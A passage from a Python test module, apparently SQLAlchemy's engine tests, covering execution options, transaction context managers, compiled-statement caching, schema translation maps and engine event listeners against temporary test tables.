{"q": "z", "p": "r"},
{"a": "b", "p": "x", "d": "e"},
{"a": "c"},
{"q": "z", "p": "x", "a": "c", "d": "e"},
),
argnames="stmt_opts, conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke_execute_events(
self, connection, stmt_opts, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_execute")
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
opts.append(("before", execution_options))
@event.listens_for(connection, "after_execute")
def after_execute(
conn,
clauseelement,
multiparams,
params,
execution_options,
result,
):
opts.append(("after", execution_options))
stmt = select(1)
if stmt_opts:
stmt = stmt.execution_options(**stmt_opts)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(stmt, execution_options=exec_opts)
else:
connection.execute(stmt)
eq_(opts, [("before", expected), ("after", expected)])
@testing.combinations(
({"user_id": 1, "user_name": "name1"},),
([{"user_id": 1, "user_name": "name1"}],),
(({"user_id": 1, "user_name": "name1"},),),
(
[
{"user_id": 1, "user_name": "name1"},
{"user_id": 2, "user_name": "name2"},
],
),
argnames="parameters",
)
def test_params_interpretation(self, connection, parameters):
users = self.tables.users
connection.execute(users.insert(), parameters)
class ConvenienceExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
cls.table = Table(
"exec_test",
metadata,
Column("a", Integer),
Column("b", Integer),
test_needs_acid=True,
)
def _trans_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
return go
def _trans_rollback_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
raise SomeException("breakage")
return go
def _assert_no_data(self):
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count("*")).select_from(self.table)),
0,
)
def _assert_fn(self, x, value=None):
with testing.db.connect() as conn:
eq_(conn.execute(self.table.select()).fetchall(), [(x, value)])
def test_transaction_engine_ctx_commit(self):
fn = self._trans_fn()
ctx = testing.db.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_engine_ctx_begin_fails_dont_enter_enter(self):
"""test #7272"""
engine = engines.testing_engine()
mock_connection = Mock(
return_value=Mock(begin=Mock(side_effect=Exception("boom")))
)
with mock.patch.object(engine, "_connection_cls", mock_connection):
# context manager isn't entered, doesn't actually call
# connect() or connection.begin()
engine.begin()
eq_(mock_connection.return_value.close.mock_calls, [])
def test_transaction_engine_ctx_begin_fails_include_enter(self):
"""test #7272
Note this behavior for 2.0 required that we add a new flag to
Connection _allow_autobegin=False, so that the first-connect
initialization sequence in create.py does not actually run begin()
events. previously, the initialize sequence used a future=False
connection unconditionally (and I didn't notice this).
"""
engine = engines.testing_engine()
close_mock = Mock()
with mock.patch.object(
engine._connection_cls,
"begin",
Mock(side_effect=Exception("boom")),
), mock.patch.object(engine._connection_cls, "close", close_mock):
with expect_raises_message(Exception, "boom"):
with engine.begin():
pass
eq_(close_mock.mock_calls, [call()])
def test_transaction_engine_ctx_rollback(self):
fn = self._trans_rollback_fn()
ctx = testing.db.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_transaction_connection_ctx_commit(self):
fn = self._trans_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_connection_ctx_rollback(self):
fn = self._trans_rollback_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_connection_as_ctx(self):
fn = self._trans_fn()
with testing.db.begin() as conn:
fn(conn, 5, value=8)
self._assert_fn(5, value=8)
class CompiledCacheTest(fixtures.TestBase):
__backend__ = True
def test_cache(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
conn = connection
cache = {}
cached_conn = conn.execution_options(compiled_cache=cache)
ins = users.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"user_name": "u1"})
cached_conn.execute(ins, {"user_name": "u2"})
cached_conn.execute(ins, {"user_name": "u3"})
eq_(compile_mock.call_count, 1)
assert len(cache) == 1
eq_(conn.exec_driver_sql("select count(*) from users").scalar(), 3)
@testing.only_on(
["sqlite", "mysql", "postgresql"],
"uses blob value that is problematic for some DBAPIs",
)
def test_cache_noleak_on_statement_values(self, metadata, connection):
# This is a non regression test for an object reference leak caused
# by the compiled_cache.
photo = Table(
"photo",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("photo_blob", LargeBinary()),
)
metadata.create_all(connection)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
class PhotoBlob(bytearray):
pass
blob = PhotoBlob(100)
ref_blob = weakref.ref(blob)
ins = photo.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"photo_blob": blob})
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
eq_(
connection.exec_driver_sql("select count(*) from photo").scalar(),
1,
)
del blob
gc_collect()
# The compiled statement cache should not hold any reference to the
# the statement values (only the keys).
eq_(ref_blob(), None)
def test_keys_independent_of_ordering(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
connection.execute(
users.insert(),
{"user_id": 1, "user_name": "u1", "extra_data": "e1"},
)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
upd = users.update().where(users.c.user_id == bindparam("b_user_id"))
with patch.object(
upd, "_compiler", Mock(side_effect=upd._compiler)
) as compile_mock:
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("user_name", "u2"),
("extra_data", "e2"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("extra_data", "e3"),
("user_name", "u3"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("extra_data", "e4"),
("user_name", "u4"),
("b_user_id", 1),
]
),
)
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
@testing.requires.schemas
def test_schema_translate_in_key(self, metadata, connection):
Table("x", metadata, Column("q", Integer))
Table("x", metadata, Column("q", Integer), schema=config.test_schema)
metadata.create_all(connection)
m = MetaData()
t1 = Table("x", m, Column("q", Integer))
ins = t1.insert()
stmt = select(t1.c.q)
cache = {}
conn = connection.execution_options(compiled_cache=cache)
conn.execute(ins, {"q": 1})
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: config.test_schema},
)
conn.execute(ins, {"q": 2})
eq_(conn.scalar(stmt), 2)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: None},
)
# should use default schema again even though statement
# was compiled with test_schema in the map
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
)
eq_(conn.scalar(stmt), 1)
class MockStrategyTest(fixtures.TestBase):
def _engine_fixture(self):
buf = StringIO()
def dump(sql, *multiparams, **params):
buf.write(str(sql.compile(dialect=engine.dialect)))
engine = create_mock_engine("postgresql+psycopg2://", executor=dump)
return engine, buf
def test_sequence_not_duped(self):
engine, buf = self._engine_fixture()
metadata = MetaData()
t = Table(
"testtable",
metadata,
Column(
"pk",
Integer,
Sequence("testtable_pk_seq"),
primary_key=True,
),
)
t.create(engine)
t.drop(engine)
eq_(re.findall(r"CREATE (\w+)", buf.getvalue()), ["SEQUENCE", "TABLE"])
eq_(re.findall(r"DROP (\w+)", buf.getvalue()), ["TABLE", "SEQUENCE"])
class SchemaTranslateTest(fixtures.TestBase, testing.AssertsExecutionResults):
__requires__ = ("schemas",)
__backend__ = True
@testing.fixture
def plain_tables(self, metadata):
t1 = Table(
"t1", metadata, Column("x", Integer), schema=config.test_schema
)
t2 = Table(
"t2", metadata, Column("x", Integer), schema=config.test_schema
)
t3 = Table("t3", metadata, Column("x", Integer), schema=None)
return t1, t2, t3
def test_create_table(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
t1.create(conn)
t2.create(conn)
t3.create(conn)
t3.drop(conn)
t2.drop(conn)
t1.drop(conn)
asserter.assert_(
CompiledSQL("CREATE TABLE __[SCHEMA__none].t1 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_foo].t2 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_bar].t3 (x INTEGER)"),
CompiledSQL("DROP TABLE __[SCHEMA_bar].t3"),
CompiledSQL("DROP TABLE __[SCHEMA_foo].t2"),
CompiledSQL("DROP TABLE __[SCHEMA__none].t1"),
)
def test_ddl_hastable(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
Table("t1", metadata, Column("x", Integer))
Table("t2", metadata, Column("x", Integer), schema="foo")
Table("t3", metadata, Column("x", Integer), schema="bar")
conn = connection.execution_options(schema_translate_map=map_)
metadata.create_all(conn)
insp = inspect(connection)
is_true(insp.has_table("t1", schema=config.test_schema))
is_true(insp.has_table("t2", schema=config.test_schema))
is_true(insp.has_table("t3", schema=None))
conn = connection.execution_options(schema_translate_map=map_)
# if this test fails, the tables won't get dropped. so need a
# more robust fixture for this
metadata.drop_all(conn)
insp = inspect(connection)
is_false(insp.has_table("t1", schema=config.test_schema))
is_false(insp.has_table("t2", schema=config.test_schema))
is_false(insp.has_table("t3", schema=None))
def test_option_on_execute(self, plain_tables, connection):
# provided by metadata fixture provided by plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection
execution_options = {"schema_translate_map": map_}
conn.execute(
t1.insert(), {"x": 1}, execution_options=execution_options
)
conn.execute(
t2.insert(), {"x": 1}, execution_options=execution_options
)
conn.execute(
t3.insert(), {"x": 1}, execution_options=execution_options
)
conn.execute(
t1.update().values(x=1).where(t1.c.x == 1),
execution_options=execution_options,
)
conn.execute(
t2.update().values(x=2).where(t2.c.x == 1),
execution_options=execution_options,
)
conn.execute(
t3.update().values(x=3).where(t3.c.x == 1),
execution_options=execution_options,
)
eq_(
conn.execute(
select(t1.c.x), execution_options=execution_options
).scalar(),
1,
)
eq_(
conn.execute(
select(t2.c.x), execution_options=execution_options
).scalar(),
2,
)
eq_(
conn.execute(
select(t3.c.x), execution_options=execution_options
).scalar(),
3,
)
conn.execute(t1.delete(), execution_options=execution_options)
conn.execute(t2.delete(), execution_options=execution_options)
conn.execute(t3.delete(), execution_options=execution_options)
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_crud(self, plain_tables, connection):
# provided by metadata fixture provided by plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
conn.execute(t1.insert(), {"x": 1})
conn.execute(t2.insert(), {"x": 1})
conn.execute(t3.insert(), {"x": 1})
conn.execute(t1.update().values(x=1).where(t1.c.x == 1))
conn.execute(t2.update().values(x=2).where(t2.c.x == 1))
conn.execute(t3.update().values(x=3).where(t3.c.x == 1))
eq_(conn.scalar(select(t1.c.x)), 1)
eq_(conn.scalar(select(t2.c.x)), 2)
eq_(conn.scalar(select(t3.c.x)), 3)
conn.execute(t1.delete())
conn.execute(t2.delete())
conn.execute(t3.delete())
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_via_engine(self, plain_tables, metadata):
with config.db.begin() as connection:
metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
with self.sql_execution_asserter(config.db) as asserter:
eng = config.db.execution_options(schema_translate_map=map_)
with eng.connect() as conn:
conn.execute(select(t2.c.x))
asserter.assert_(
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2")
)
class ExecutionOptionsTest(fixtures.TestBase):
def test_dialect_conn_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c2 = conn.execution_options(foo="bar")
eq_(
engine.dialect.set_connection_execution_options.mock_calls,
[call(c2, {"foo": "bar"})],
)
def test_dialect_engine_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(
engine.dialect.set_engine_execution_options.mock_calls,
[call(e2, {"foo": "bar"})],
)
def test_dialect_engine_construction_options(self):
dialect = Mock()
engine = Engine(
Mock(), dialect, Mock(), execution_options={"foo": "bar"}
)
eq_(
dialect.set_engine_execution_options.mock_calls,
[call(engine, {"foo": "bar"})],
)
def test_propagate_engine_to_connection(self, testing_engine):
engine = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
with engine.connect() as conn:
eq_(conn._execution_options, {"foo": "bar"})
def test_propagate_option_engine_to_connection(self, testing_engine):
e1 = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
e2 = e1.execution_options(bat="hoho")
c1 = e1.connect()
c2 = e2.connect()
eq_(c1._execution_options, {"foo": "bar"})
eq_(c2._execution_options, {"foo": "bar", "bat": "hoho"})
c1.close()
c2.close()
def test_get_engine_execution_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(e2.get_execution_options(), {"foo": "bar"})
def test_get_connection_execution_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c = conn.execution_options(foo="bar")
eq_(c.get_execution_options(), {"foo": "bar"})
class EngineEventsTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def _assert_stmts(self, expected, received):
list(received)
for stmt, params, posn in expected:
if not received:
assert False, "Nothing available for stmt: %s" % stmt
while received:
teststmt, testparams, testmultiparams = received.pop(0)
teststmt = (
re.compile(r"[\n\t ]+", re.M).sub(" ", teststmt).strip()
)
if teststmt.startswith(stmt) and (
testparams == params or testparams == posn
):
break
def test_engine_connect(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
# use a real def to trigger legacy signature decorator
# logic, if present
def thing(conn):
canary(conn)
event.listen(e1, "engine_connect", thing)
c1 = e1.connect()
c1.close()
c2 = e1.connect()
c2.close()
eq_(canary.mock_calls, [mock.call(c1), mock.call(c2)])
def test_per_engine_independence(self, testing_engine):
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
canary = Mock()
event.listen(e1, "before_execute", canary)
s1 = select(1)
s2 = select(2)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1])
event.listen(e2, "before_execute", canary)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1, s1, s2])
def test_per_engine_plus_global(self, testing_engine):
canary = Mock()
event.listen(Engine, "before_execute", canary.be1)
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be2)
event.listen(Engine, "before_execute", canary.be3)
with e1.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
with e2.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 2)
eq_(canary.be2.call_count, 1)
eq_(canary.be3.call_count, 2)
def test_emit_sql_in_autobegin(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
@event.listens_for(e1, "begin")
def begin(connection):
result = connection.execute(select(1)).scalar()
canary.got_result(result)
with e1.connect() as conn:
conn.execute(select(1)).scalar()
assert conn.in_transaction()
conn.commit()
assert not conn.in_transaction()
eq_(canary.mock_calls, [call.got_result(1)])
def test_per_connection_plus_engine(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be1)
conn = e1.connect()
event.listen(conn, "before_execute", canary.be2)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
@testing.combinations(
(True, False),
(True, True),
(False, False),
argnames="mock_out_on_connect, add_our_own_onconnect",
)
def test_insert_connect_is_definitely_first(
self, mock_out_on_connect, add_our_own_onconnect, testing_engine
):
"""test issue #5708.
We want to ensure that a single "connect" event may be invoked
*before* dialect initialize as well as before dialect on_connects.
This is also partially reliant on the changes we made as a result of
#5497, however here we go further with the changes and remove use
of the pool first_connect() event entirely so that the startup
for a dialect is fully consistent.
"""
if mock_out_on_connect:
if add_our_own_onconnect:
def our_connect(connection):
m1.our_connect("our connect event")
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: our_connect,
)
else:
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: None,
)
else:
patcher = nullcontext()
with patcher:
e1 = testing_engine(config.db_url)
initialize = e1.dialect.initialize
def init(connection):
initialize(connection)
connection.execute(select(1))
# begin mock added as part of migration to future only
# where we don't want anything related to begin() happening
# as part of create
# note we can't use an event to ensure begin() is not called
# because create also blocks events from happening
with mock.patch.object(
e1.dialect, "initialize", side_effect=init
) as m1, mock.patch.object(
e1._connection_cls, "begin"
) as begin_mock:
@event.listens_for(e1, "connect", insert=True)
def go1(dbapi_conn, xyz):
m1.foo("custom event first")
@event.listens_for(e1, "connect")
def go2(dbapi_conn, xyz):
m1.foo("custom event last")
c1 = e1.connect()
m1.bar("ok next connection")
c2 = e1.connect()
# this happens with sqlite singletonthreadpool.
# we can almost use testing.requires.independent_connections
# but sqlite file backend will also have independent
# connections here.
its_the_same_connection = (
c1.connection.dbapi_connection
is c2.connection.dbapi_connection
)
c1.close()
c2.close()
eq_(begin_mock.mock_calls, [])
if add_our_own_onconnect:
calls = [
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
else:
calls = [
mock.call.foo("custom event first"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
if not its_the_same_connection:
if add_our_own_onconnect:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call.foo("custom event last"),
]
)
else:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.foo("custom event last"),
]
)
eq_(m1.mock_calls, calls)
def test_new_exec_driver_sql_no_events(self):
m1 = Mock()
def select1(db):
return str(select(1).compile(dialect=db.dialect))
with testing.db.connect() as conn:
event.listen(conn, "before_execute", m1.before_execute)
event.listen(conn, "after_execute", m1.after_execute)
conn.exec_driver_sql(select1(testing.db))
eq_(m1.mock_calls, [])
def test_add_event_after_connect(self, testing_engine):
# new feature as of #2978
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
conn = e1.connect()
event.listen(e1, "before_execute", canary.be1)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
def test_force_conn_events_false(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
event.listen(e1, "before_execute", canary.be1)
conn = e1._connection_cls(
e1, connection=e1.raw_connection(), _has_events=False
)
conn.execute(select(1))
eq_(canary.be1.call_count, 0)
def test_cursor_events_ctx_execute_scalar(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
dialect = conn.dialect
ctx = dialect.execution_ctx_cls._init_statement(
dialect, conn, conn.connection, {}, stmt, {}
)
ctx._execute_scalar(stmt, Integer())
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
def test_cursor_events_execute(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
result = conn.exec_driver_sql(stmt)
eq_(result.scalar(), 1)
ctx = result.context
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
@testing.combinations(
(
([{"x": 5, "y": 10}, {"x": 8, "y": 9}],),
{},
[{"x": 5, "y": 10}, {"x": 8, "y": 9}],
{},
),
(({"z": 10},), {}, [], {"z": 10}),
argnames="multiparams, params, expected_multiparams, expected_params",
)
def test_modify_parameters_from_event_one(
self,
multiparams,
params,
expected_multiparams,
expected_params,
testing_engine,
):
# this is testing both the normalization added to parameters
# as of I97cb4d06adfcc6b889f10d01cc7775925cffb116 as well as
# that the return value from the event is taken as the new set
# of parameters.
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
eq_(multiparams, expected_multiparams)
eq_(params, expected_params)
return clauseelement, (), {"q": "15"}
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
eq_(multiparams, ())
eq_(params, {"q": "15"})
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
result = conn.execute(
select(bindparam("q", type_=String)), *multiparams, **params
)
eq_(result.all(), [("15",)])
@testing.provide_metadata
def test_modify_parameters_from_event_two(self, connection):
t = Table("t", self.metadata, Column("q", Integer))
t.create(connection)
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {}
event.listen(connection, "before_execute", before_execute, retval=True)
connection.execute(t.insert(), {"q": 12})
event.remove(connection, "before_execute", before_execute)
eq_(
connection.execute(select(t).order_by(t.c.q)).fetchall(),
[(15,), (19,)],
)
def test_modify_parameters_from_event_three(
self, connection, testing_engine
):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {"q": 7}
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
with expect_raises_message(
tsa.exc.InvalidRequestError,
"Event handler can't return non-empty multiparams "
"and params at the same time",
):
with e1.connect() as conn:
conn.execute(select(literal("1")))
@testing.only_on("sqlite")
def test_dont_modify_statement_driversql(self, connection):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
# the event does not take effect for the "driver SQL" option
eq_(connection.exec_driver_sql("select 'hi'").scalar(), "hi")
# event is not called at all
eq_(m1.mock_calls, [])
@testing.only_on("sqlite")
def test_modify_statement_internal_driversql(self, connection):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
eq_(
connection.exec_driver_sql("select 'hi'").scalar(),
"hi",
)
eq_(m1.mock_calls, [])
def test_modify_statement_clauseelement(self, connection):
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
return select(literal_column("'there'")), multiparams, params
eq_(connection.scalar(select(literal_column("'hi'"))), "there")
def test_argument_format_execute(self, testing_engine):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
conn.execute(select(1))
conn.execute(select(1).compile(dialect=e1.dialect).statement)
conn.execute(select(1).compile(dialect=e1.dialect))
conn._execute_compiled(
select(1).compile(dialect=e1.dialect), (), {}
)
def test_execute_events(self):
stmts = []
cursor_stmts = []
def execute(
conn, clauseelement, multiparams, params, execution_options
):
stmts.append((str(clauseelement), params, multiparams))
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
cursor_stmts.append((str(statement), parameters, None))
# TODO: this test is kind of a mess
for engine in [
engines.testing_engine(),
engines.testing_engine().connect(),
]:
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
m = MetaData()
t1 = Table(
"t1",
m,
Column("c1", Integer, primary_key=True),
Column(
"c2",
String(50),
default=func.lower("Foo"),
primary_key=True,
),
implicit_returning=False,
)
if isinstance(engine, Connection):
ctx = None
conn = engine
else:
ctx = conn = engine.connect()
trans = conn.begin()
try:
m.create_all(conn, checkfirst=False)
try:
conn.execute(t1.insert(), dict(c1=5, c2="some data"))
conn.execute(t1.insert(), dict(c1=6))
eq_(
conn.execute(text("select * from t1")).fetchall(),
[(5, "some data"), (6, "foo")],
)
finally:
m.drop_all(conn)
trans.commit()
finally:
if ctx:
ctx.close()
compiled = [
("CREATE TABLE t1", {}, None),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(),
),
("INSERT INTO t1 (c1, c2)", {"c1": 6}, ()),
("select * from t1", {}, None),
("DROP TABLE t1", {}, None),
]
cursor = [
("CREATE TABLE t1", {}, ()),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(5, "some data"),
),
("SELECT lower", {"lower_2": "Foo"}, ("Foo",)),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "foo", "c1": 6},
(6, "foo"),
),
("select * from t1", {}, ()),
("DROP TABLE t1", {}, ()),
]
self._assert_stmts(compiled, stmts)
self._assert_stmts(cursor, cursor_stmts)
def test_options(self):
canary = []
def execute(conn, *args, **kw):
canary.append("execute")
def cursor_execute(conn, *args, **kw):
canary.append("cursor_execute")
engine = engines.testing_engine()
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
conn = engine.connect()
c2 = conn.execution_options(foo="bar")
eq_(c2._execution_options, {"foo": "bar"})
c2.execute(select(1))
